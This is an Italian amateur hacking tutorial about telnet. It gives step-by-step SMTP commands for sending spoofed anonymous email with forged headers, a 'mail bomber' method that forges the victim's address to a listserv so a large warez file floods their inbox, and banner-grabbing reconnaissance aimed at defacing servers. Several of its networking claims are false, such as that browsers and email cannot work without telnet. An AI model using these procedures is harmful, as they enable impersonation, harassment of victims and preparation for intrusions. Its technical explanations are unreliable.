Hacker Lesson N°4 NON MI RITENGO RESPONSABILE DELL’USO KE
VERRA’ FATTO DI QUESTA GUIDA... L’USO SCORRETTO O ILLECITO
E’ A RISCHIO E PERICOLO DELL’UTENTE…
LA GUIDA E’ STATA CREATA CON LO SCOPO DI INFORMARE GLI
UTENTI DEI PERICOLI COSTANTI DELLA RETE E AMPLIARE LE LORO
CONOSCENZE…
questa lezione sara mooolto piu interessante di quella predecente riguardante Social Engineering cioe l'ingegneria
sociale
Bene… Devo ammettervi ke questo capitolo mi appassiona… Telnet… La base di ogni Hacker…Ve la insegno affinché
impariate ogni suo trukko
Telnet
Telnet è forse il programmino + importante x un sistema operativo windows e sicuramente il + imp x un hacker… Si trova
in C:/Windows/System32/[Link], si può fare un collegamento sul desktop x comodità, oppure scrivere nel prompt dei
comandi telnet x aprirlo… Innanzi tutto sappiate ke senza telnet noi nn potremmo utilizzare internet… Crediate ke basta
un browser x navigare??? Senza telnet il browser è un esserino insulso… Infatti, quando vogliamo collegarci a un sito,
telnet si attiva e manda la richiesta di visualizzare la pagina al sito ke risponde con la pagina desiderata… Siccome
telnet nn ha un’interfaccia grafica, cioè solo numeri e lettere su sfondo nero, entra in azione il browser ke trasforma i dati
in pagina da visualizzare… La stessa cosa quando usiamo un client x ftp… è il telnet ke invia la richiesta alla porta 21 e
il client la trasforma in grafica… la stessa cosa x l’smtp, porta 25, x l’invio della posta… Snz telnet nn si potrebbe inviare
posta… Capito??? Come ho detto è anche l’arma elementare di un hacker… Senza telnet si può fare ben poco … Cmq
in qst guida vi insegnero a mandare mail anonime da telnet, creare un bomber, oppure come carpire informazioni da un
server x procedere con l’attacco adatto… …Fine Teoria… Inizio Pratica…
Anonymous Mail with Telnet
Inviare mail anonime con telnet è + lungo e diciamolo, + faticoso di un semplice programmino… Ma i programmi gli
usano i lamer… Bisogna farsi le ossa… Ricordate ke “la strada + semplice nn porta sempre al risultato migliore”!!
Sappiate ke con telnet nn potete commettere errori xkè nn si può cancellare con il backspace… Se lo faceste il server vi
identificherebbe subito, quindi occhio… Aprite un doc di txt e scrivete lì, poi copiate e incollate su telnet…
Prima cosa da fare… Aprire il telnet… Poi… Collegarci al nostro provider e alla porta 25… x esempio io ho [Link]…
Open [Link] 25
Il server ci risponderà… Adesso dobbiamo salutarlo… Usiamo il comando helo, non hello…
Helo [Link]
Il server ci risponderà positivamente… Alcuni c rispondono con una frase di benvenuto… Ora scriviamo il mittente…
falso naturalmente…
Mail from:<badangel@[Link]>
Fatto… Ora scriviamo il destinatario…
Rcpt to:<vittima@[Link]>
Ora possiamo iniziare il mess… scriviamo data e premiamo invio… Adesso dobbiamo mettere gli headers… Cosa sono?
Gli headers sono quelle frasi all’inizio del mex ke mostrano il mittente del messaggio… Comparirebbe il nostro ip…
Dobbiamo provvedere inventandoci degli headers, ke si dimostrino almeno credibili … Scriviamo…
Received: by [Link] id AA11515 with SMPT; Sat, 28 Oct 15:46:45
Premiamo invio… Naturalmente [Link] va cambiato a seconda del server al quale vi siete connessi… AA11515 è la
“targhetta” del server… Inventatela, basta ke inizi con AA11… Ora scrivete…
Message-ID: <111.AA1517@[Link]>
AA1517, dv essere diverso da AA11515 ke abbiamo messo prima… ora…
From: "BadAngel Telnet Commands"
<badangel@[Link]>
In from mettiamo il nome ke vogliamo ke compaia, e sotto il nostro falso indirizzo…
To: <vittima@[Link]>
Date: Sat, 28 Oct 15:46:45
Sarebbe la data ke avete messo in Received…
Subject: "Qui va l’oggetto della mail"
E finalmente qui il messaggio!!!!!! Era ora no??
Premete 2 volte invio, mettete un punto e ripremete invio… Il server vi dirà ke la mail è stata inviata… Ora scrivete quit e
premete invio… finito, mail inviata… … Potete provare su un vostro account x vedere se funziona veramente (funziona,
funziona!)…
Mail Bomber with Telnet
Bene… Ora vogliamo fare una lamerata… Vogliamo fare a pezzi la casella postale d uno ke ci stizza… niente di +
semplice con telnet… basta avere un client ftp… io uso FTP Explorer…
Colleghiamoci alla porta 25 del nostro provider usando sempre telnet… Facciamo come se dovessimo inviare una
semplice mail…
Open [Link] 25
Helo [Link]
Mail from:<vittima@[Link]>
Rcpt to:<listserv@[Link]>
Data
Received: by [Link] id AA11515 with SMPT; Sat, 28 Oct 15:46:45
Message-ID: <111.AA1517@[Link]>
From: "You’re Hacked"
<vittima@[Link]>
To: <listserv@[Link]>
Date: Sat, 28 Oct 15:46:45
Subject: "You’re Hacked"
Bene, fermiamoci qui x ora… E’ la stessa (o quasi) mail di prima, tranne qualke particolare… intanto il mittente è la
vittima e il destinatario è il listserv… Ma ke succede?? Il listserv è un indirizzo al quale I messaggi nn vengono recapitati,
ma tornano al mittente… + semplice di così’ nn riesco a spiegarvelo… Continuiamo il mex e poi via ai commenti…
Aprima il nostro FTP Explorer e colleghiamoci a un server warez, cioè un server piratato, dove noi abbiamo la possibilità
di scaricarci cose e di metterne di nuove… facciamo sia [Link]… colleghiamoci e vediamo ke programmi c sono…
cerchiamo un prog d circa 5 MB… trovato? Bene, salvatevi nome e directory… Chiudete ftp explorer e scrivete in
telnet…
Reply vittima@[Link]
Connect [Link] anonymous BadAngel@[Link]
Binary
Get percorso/xtrovare/ilfile/[Link]
Quit
Premete invio 2 volte, mettete un punto e ripremete invio, scrivete quit e invio… Inviata…
Ke abbiamo fatto??? Beh… Ci siamo finti la vittima e abbiamo inviato una mail a un listserv dove abbiamo “allegato” un
file di 5 mb preso da un server warez… Il listserv l’ha rispedito indietro all’indirizzo mittente (la vittima), insieme ai 5
MB… dato ke i servizi di posta tendono a spezzettare le mail troppo grandi, la casella della vittima si riempirebbe di
mail… E noi ci saremmo vendicati … E’ da lamer fare così, ve lo dico e ve lo ripeto… Evitate…
Lista Provider + relativo nome x SMTP
[Link] ------------> [Link]
ALICE ADSL ---------> [Link]
[Link] ------------------> [Link]
VIRGILIO -------------> [Link] - [Link]
TISCALI ---------------> [Link]
TELE2 -----------------> [Link]
Ho messo le + importanti… Con MSN HOTMAIL nn si possono inviare mail, solo riceverne usando telnet, ve lo dico fin
dall’inizio così nn mi crepate!!
P.S. I listserv credo ke si trovino su internet… Io quando provai a cercarne qualcuno, nn ne trovai, poi ki sa??
Scoprire Informazioni su un Server
Non c’è niente e molto da dirvi… Si potrebbe andare anche x logica, ma è meglio chiarire tutto e bene… Noi vogliamo
Hackerare un server, ma è invulnerabile a SQL e Remote Command Injection, Remote File Inclusion, Cookie
Manipulation, insomma quasi tutte le tecnike… Vogliamo defacciarlo (bucarlo cambiando l’home page)… Dobbiamo
sapere la versione xkè altrimenti nn potremmo sfruttare qualke bug…
Usiamo telnet… Ci connettiamo a una qualsiasi porta… Facciamo la 25… Appena ci connettiamo, il server ci da un
risposta… A volte con informazioni tipo la versione e il so (sistema operativo) usato… Molto utile se x esempio vogliamo
sfruttare un bug x qll versione… Oppure se ci interessa sapere ke so è e collegandoci alla porta 25 nn ci riusciamo,
proviamo a connetterci a porte presenti solo in windows o solo in Unix… x esempio possiamo collegarci alla 79 (finger),
o alle 138 – 139 (netbios) x windows… Oppure al telnet (23) x unix!! Insomma un po’ d fantasia …